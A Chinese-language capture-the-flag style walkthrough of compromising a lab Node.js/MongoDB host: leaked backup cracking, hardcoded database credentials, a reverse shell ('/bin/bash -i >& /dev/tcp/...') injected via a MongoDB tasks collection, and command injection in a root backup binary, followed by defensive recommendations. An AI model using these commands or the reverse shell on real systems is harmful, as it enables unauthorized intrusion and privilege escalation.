NodeJS API泄露与权限提升漏洞分析<\/h1>

目标系统概述<\/h2>
IP地址: 10.10.10.58<\/li>
开放端口:
22\/tcp (SSH)<\/li>
3000\/tcp (Hadoop任务追踪器\/NodeJS应用)<\/li> <\/ul> <\/li> <\/ul>
信息收集阶段<\/h2>

端口扫描结果<\/h3>
$ nmap -p- 10.10.10.58 --min-rate 1000<\/span> -sC -sV -Pn
<\/span><\/span>
<\/span><\/span>PORT     STATE SERVICE            VERSION
<\/span><\/span>22\/tcp   open  ssh                OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
<\/span><\/span>3000\/tcp open  hadoop-tasktracker Apache Hadoop
<\/span><\/span>| hadoop-datanode-info: 
<\/span><\/span>|_  Logs: \/login
<\/span><\/span>|_http-title: MyPlace
<\/span><\/span><\/code><\/pre>Web应用发现<\/h3>

访问地址: http:\/\/10.10.10.58:3000<\/li>
API端点: http:\/\/10.10.10.58:3000\/api\/users\/<\/li>
<\/ul>
漏洞利用过程<\/h2>
1. 备份文件泄露<\/h3>

发现备份文件: http:\/\/10.10.10.58:3000\/myplace.backup<\/li>
分析备份文件:
$ binwalk myplace.backup
<\/span><\/span>$ cat myplace.backup|base64 -d >myplace.backup.decode
<\/span><\/span><\/code><\/pre><\/li>
破解备份文件密码:
$ zip2john myplace.backup.decode -o myplace.backup.decode.john
<\/span><\/span>$ john --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt myplace.backup.decode.john
<\/span><\/span><\/code><\/pre>
破解出的密码: magicword<\/code><\/li>
<\/ul>
<\/li>
解压备份文件:
$ unzip myplace.backup.decode
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2. 数据库凭证泄露<\/h3>
在解压后的文件中发现关键信息:<\/p>
$ cat var\/www\/myplace\/app.js
<\/span><\/span><\/code><\/pre>发现MongoDB连接字符串:<\/p>
mongodb:\/\/mark:5AYRft73VtFpc84k@localhost:27017\/myplace?authMechanism=DEFAULT&authSource=myplace
<\/code><\/pre>

用户名: mark<\/li>
密码: 5AYRft73VtFpc84k<\/li>
<\/ul>
3. TRP00F自动权限提升<\/h3>
使用TRP00F工具进行权限提升:<\/p>
$ python3 trp00f.py --lhost 10.10.16.24 --lport 10033<\/span> --rhost 10.10.16.24 --rport 10034<\/span> --http 9999<\/span> --password '5AYRft73VtFpc84k'<\/span>
<\/span><\/span><\/code><\/pre>4. MongoDB命令注入<\/h3>

通过SSH登录mark账户:
$ ssh mark@10.10.10.58
<\/span><\/span><\/code><\/pre><\/li>
分析app.js中的任务调度机制:

脚本每30秒从MongoDB的tasks集合中获取命令并执行<\/li>
执行后会删除对应的文档<\/li>
<\/ul>
<\/li>
利用MongoDB注入反弹shell:
$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
<\/span><\/span>> db.tasks.insert({<\/span>"cmd"<\/span>: "\/bin\/bash -c '\/bin\/bash -i >& \/dev\/tcp\/10.10.16.24\/10035 0>&1'"<\/span>})<\/span>
<\/span><\/span>> db.tasks.find()<\/span>
<\/span><\/span><\/code><\/pre><\/li>
获取user flag:
b0ca19843af3d049a782f7f16b0cf144
<\/code><\/pre>
<\/li>
<\/ol>
5. 备份工具权限提升<\/h3>

发现可疑二进制文件:
$ file \/usr\/local\/bin\/backup
<\/span><\/span><\/code><\/pre><\/li>
分析发现-q选项存在命令注入漏洞:
$ \/usr\/local\/bin\/backup -q ""<\/span> '
<\/span><\/span><\/span>\/bin\/bash'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
获取root flag:
2278ab816e1cd3204d1b331144bf9704
<\/code><\/pre>
<\/li>
<\/ol>
关键漏洞总结<\/h2>


API端点泄露<\/strong>:<\/p>

\/api\/users\/ 暴露了用户凭证信息<\/li>
<\/ul>
<\/li>

备份文件泄露<\/strong>:<\/p>

未加密的备份文件可通过Web访问<\/li>
备份文件包含敏感配置信息<\/li>
<\/ul>
<\/li>

MongoDB弱凭证<\/strong>:<\/p>

硬编码的数据库凭证<\/li>
凭证复用问题(Web应用和系统用户使用相同凭证)<\/li>
<\/ul>
<\/li>

任务调度命令注入<\/strong>:<\/p>

应用从数据库直接读取并执行命令<\/li>
无任何输入验证或过滤<\/li>
<\/ul>
<\/li>

备份工具命令注入<\/strong>:<\/p>

参数处理不当导致命令注入<\/li>
以root权限运行<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>


API安全<\/strong>:<\/p>

限制敏感API端点的访问<\/li>
实施适当的认证和授权机制<\/li>
<\/ul>
<\/li>

备份安全<\/strong>:<\/p>

不要将备份文件存储在Web可访问目录<\/li>
对备份文件进行加密<\/li>
<\/ul>
<\/li>

凭证管理<\/strong>:<\/p>

避免硬编码凭证<\/li>
使用不同的凭证用于不同服务<\/li>
实施定期凭证轮换<\/li>
<\/ul>
<\/li>

输入验证<\/strong>:<\/p>

对所有从数据库读取的数据进行验证<\/li>
实施最小权限原则<\/li>
<\/ul>
<\/li>

命令执行安全<\/strong>:<\/p>

避免直接执行来自不可信源的命令<\/li>
使用白名单机制限制可执行命令<\/li>
<\/ul>
<\/li>

权限管理<\/strong>:<\/p>

避免以root权限运行不必要的服务<\/li>
实施适当的权限分离<\/li>
<\/ul>
<\/li>
<\/ol>